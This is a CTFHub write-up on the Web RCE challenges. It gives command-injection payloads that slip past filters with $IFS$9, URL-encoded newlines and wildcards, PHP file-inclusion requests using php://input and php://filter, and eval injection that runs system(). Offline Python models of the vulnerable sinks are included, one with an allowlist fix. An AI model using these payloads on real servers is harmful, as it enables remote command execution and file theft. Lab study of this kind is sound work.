[CTFHub] Web RCE Write-ups
阿新 • Published: 2020-12-30
Command injection
Input:
127.0.0.1 | ls -al
View the file:
127.0.0.1 | cat [flag filename]
cat filtered
Use less or more instead (any other file reader such as head or tail works the same way).
Spaces filtered
Use
$IFS$9
in place of the space, then enter:
127.0.0.1|cat$IFS$9flag_3760913111752.php
$IFS expands to the shell's field separator characters (space, tab, newline), and $9 is the empty ninth positional parameter; it is only there to end the variable name, since $IFSflag would be read as a variable called IFSflag.
Directory separator filtered
cd into the directory first instead of writing a path containing /:
127.0.0.1;cd flag_is_here;cat flag_11132792223723.php
Operators filtered
; still works as a command separator:
127.0.0.1;cat flag_209472690126349.php
Command injection - comprehensive exercise
First send this to show where the flag file is. Note that flag is written with a wildcard (fla*) because the word itself is filtered; %0a (a URL-encoded newline) serves as the command separator and $IFS$9 as the space:
http://challenge-d810582d3784c897.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd$IFS$9fla*_is_here%0als$IFS$9-al
Final answer:
http://challenge-d810582d3784c897.sandbox.ctfhub.com:10080/?ip=127.0.0.1%0acd$IFS$9fla*_is_here%0amore$IFS$9fla*_8941778912527.php
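Before sending these at a target it helps to check why each piece of the payload survives the filter. The following is an added example, not code from the original write-up or from CTFHub: a Python mock of the `ping -c 4 $ip` sink whose blocklist (space, `/`, `flag`, `|`, `&`, `;`) is an assumption modelled on the comprehensive challenge, run against a constructed `flag_is_here/flag_1234.php` in a temporary directory. `ping` is swapped for the shell builtin `true` so the example runs offline.

```python
"""Local mock of the CTFHub command-injection sink (added example, not the
challenge's own PHP).  The sink builds `ping -c 4 <ip>` by string
concatenation, so whatever separators the input contains reach /bin/sh."""
import os
import subprocess
import tempfile

# Blocklist modelled on the comprehensive challenge (an assumption for this
# example).  Newline, '$', '*' and '?' are deliberately not on it, which is
# exactly what the bypass relies on.
BLOCKED_TOKENS = (" ", "/", "flag", "|", "&", ";")


def is_blocked(payload: str) -> bool:
    """Mimic the challenge's input filter: any blocked token rejects the request."""
    return any(tok in payload for tok in BLOCKED_TOKENS)


def make_sandbox() -> str:
    """Recreate the challenge layout flag_is_here/flag_<id>.php.
    Directory, file name and flag value are constructed for this example."""
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "flag_is_here"))
    with open(os.path.join(root, "flag_is_here", "flag_1234.php"), "w") as fh:
        fh.write("<?php // ctfhub{constructed_flag}\n")
    return root


def run_payload(root: str, payload: str) -> str:
    """Emulate shell_exec("ping -c 4 " . $ip): the input is appended unquoted
    to a command string and handed to sh.  `true` stands in for `ping` so the
    demo needs no network; the injection point is unchanged."""
    if is_blocked(payload):
        return "BLOCKED"
    proc = subprocess.run(
        ["sh", "-c", "true -c 4 " + payload],
        cwd=root, capture_output=True, text=True,
    )
    return (proc.stdout + proc.stderr).strip()


# Payloads from the write-up, with %0a already URL-decoded to a real newline
# (PHP decodes the query string before the value reaches the shell).
# In BYPASS: the newline ends a command like ';' would, $IFS$9 expands to
# IFS whitespace followed by the empty 9th positional parameter (so sh splits
# "cd" from its argument), and fla* lets pathname expansion supply the
# blocked word "flag".
NAIVE = "127.0.0.1|cat flag_is_here/flag_1234.php"
BYPASS = "127.0.0.1\ncd$IFS$9fla*_is_here\ncat$IFS$9fla*_1234.php"

if __name__ == "__main__":
    root = make_sandbox()
    print(run_payload(root, NAIVE))    # BLOCKED
    print(run_payload(root, BYPASS))   # <?php // ctfhub{constructed_flag}
```

When cat itself is filtered, swap `cat` in BYPASS for `less`, `more`, `head` or `tail`; the separator and whitespace tricks are unchanged.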
File inclusion
This challenge combines GET and POST: the GET selects shell.txt as the file to include, and the POST body supplies the PHP that shell.txt evaluates.
GET:
http://challenge-647375ee75c1e32b.sandbox.ctfhub.com:10080/?file=shell.txt
POST:
ctfhub=system("cat /flag");
Reference articles:
https://blog.csdn.net/Xxy605/article/details/107556509
https://winny.work/ctfhub技能樹_web_rce之eval、檔案包含/680.html
Finding the flag:
find / -name flag*
(Quote the pattern as 'flag*' if a file matching it exists in the current directory; otherwise the shell expands the glob before find sees it.)
php://input
Intercept with Burp, send the request to Repeater, and build the POST request (php://input can only be included when allow_url_include is on):
POST /?file=php://input HTTP/1.1
Host: challenge-b6e75eaa899f147c.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 38
<?php system('find / -name *flag*');?>
The flag file is found and its contents printed, which proves that php://input can be used here.
Remote inclusion
Here both POST and GET work. Why? The file parameter is read from the query string, and php://input returns the raw request body regardless of the HTTP method, so a GET that carries a body is handled exactly like the POST:
GET /?file=php://input HTTP/1.1
Host: challenge-4c672ad46ce5abfc.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 29
<?php system('cat /flag*');?>
Reading source code
php://filter is not restricted by allow_url_include. Without a filter chain, include() parses the resource as-is, so the plain-text /flag is simply printed:
POST /?file=php://filter/resource=/flag HTTP/1.1
Host: challenge-bcf11eabbe47b7f4.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 0
Another answer: base64-encode the resource first. This is the variant to use on .php files, whose code would otherwise be executed by include() instead of shown; the base64 text contains no PHP tags, so it is echoed verbatim and can be decoded locally:
POST /?file=php://filter/read=convert.base64-encode/resource=/flag HTTP/1.1
Host: challenge-bcf11eabbe47b7f4.sandbox.ctfhub.com:10080
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Length: 0
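To see what each ?file= value actually hands to include(), and why the base64 variant is needed for PHP sources, here is an added example that is not part of the original write-up or of CTFHub: a Python model of the vulnerable sink next to a hardened one. It follows the documented behaviour of the php://input and php://filter wrappers rather than PHP's own implementation, models only the filters used on this page plus string.rot13, roots absolute paths at a temporary docroot so it stays offline, and the files flag and index.php it creates are constructed.

```python
"""Model of include($_GET['file']) for the three inclusion levels above
(added example; not PHP's code and not the challenge's)."""
import base64
import codecs
import os
import tempfile

# Hardened variant: the only values include() may ever see (an assumption
# for the example; a real app lists its own page templates here).
ALLOWED_PAGES = {"index": "index.php"}


def make_docroot() -> str:
    """Throwaway docroot with constructed files: a plain-text /flag and a PHP
    source file whose code must not be shown to the browser."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "flag"), "wb") as fh:
        fh.write(b"ctfhub{constructed_flag}\n")
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'home'; ?>")
    return root


def read_local(path: str, docroot: str) -> bytes:
    """Plain filesystem include.  Absolute paths such as /flag are rooted at
    the temporary docroot so the example never leaves it (model choice)."""
    with open(os.path.join(docroot, path.lstrip("/")), "rb") as fh:
        return fh.read()


def apply_filters(spec: str, data: bytes) -> bytes:
    """Apply a php://filter chain such as 'read=convert.base64-encode'.
    Filters are separated by '|'; an empty spec (php://filter/resource=/flag)
    applies none."""
    if spec.startswith("read="):
        spec = spec[len("read="):]
    for name in [n for n in spec.split("|") if n]:
        if name == "convert.base64-encode":
            data = base64.b64encode(data)
        elif name == "string.rot13":
            data = codecs.encode(data.decode("latin-1"), "rot_13").encode("latin-1")
        else:
            raise ValueError(f"filter not modelled: {name!r}")
    return data


def resolve_include(file_param: str, request_body: bytes, docroot: str) -> bytes:
    """Vulnerable sink: the bytes include($_GET['file']) feeds to the PHP
    parser.  php://input is the raw body whatever the HTTP method, which is
    why the remote-inclusion level accepts GET as well as POST."""
    if file_param == "php://input":
        return request_body
    if file_param.startswith("php://filter/"):
        spec = file_param[len("php://filter/"):]
        idx = spec.find("resource=")
        if idx < 0:
            raise ValueError("php://filter needs a resource= part")
        filter_spec = spec[:idx].strip("/")
        resource = spec[idx + len("resource="):]   # may itself contain '/'
        return apply_filters(filter_spec, read_local(resource, docroot))
    return read_local(file_param, docroot)


def page_output(included: bytes) -> str:
    """What the browser gets back.  include() parses the bytes, so anything in
    <?php ... ?> runs instead of being printed.  This model does not execute
    PHP; it only reports that the source would have been consumed."""
    if b"<?" in included:
        return "(PHP code executed; source not shown)"
    return included.decode()


def decode_leaked_source(response: str) -> bytes:
    """Attacker side: undo convert.base64-encode on the echoed page body."""
    return base64.b64decode(response)


def is_allowed(file_param: str) -> bool:
    return file_param in ALLOWED_PAGES


def hardened_include(file_param: str, docroot: str) -> bytes:
    """Fix: map a fixed key to a file name so user input never reaches
    include(); wrappers, absolute paths and traversal have nothing to act on."""
    if not is_allowed(file_param):
        raise PermissionError(f"unknown page {file_param!r}")
    return read_local(ALLOWED_PAGES[file_param], docroot)


if __name__ == "__main__":
    root = make_docroot()
    print(page_output(resolve_include("php://input", b"<?php system('cat /flag*');?>", root)))
    print(page_output(resolve_include("php://filter/resource=/flag", b"", root)))
    print(page_output(resolve_include("index.php", b"", root)))
    leaked = page_output(resolve_include(
        "php://filter/read=convert.base64-encode/resource=index.php", b"", root))
    print(decode_leaked_source(leaked))
    print(hardened_include("index", root))
```

The run shows the point of the two php://filter requests above: /flag is plain text and comes back as-is, index.php included directly yields nothing readable, and the same file behind convert.base64-encode comes back intact for offline decoding. Note that the hardened version keys on a name, not on a blocklist of wrapper prefixes; a blocklist would still have to anticipate every scheme and case variant.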
eval execution
The cmd parameter goes straight into eval(), so any PHP statement runs:
http://challenge-88b4fef25925e427.sandbox.ctfhub.com:10080/?cmd=system("find / -name *flag*");
Once the flag file is found:
http://challenge-88b4fef25925e427.sandbox.ctfhub.com:10080/?cmd=system("cat /flag_29995");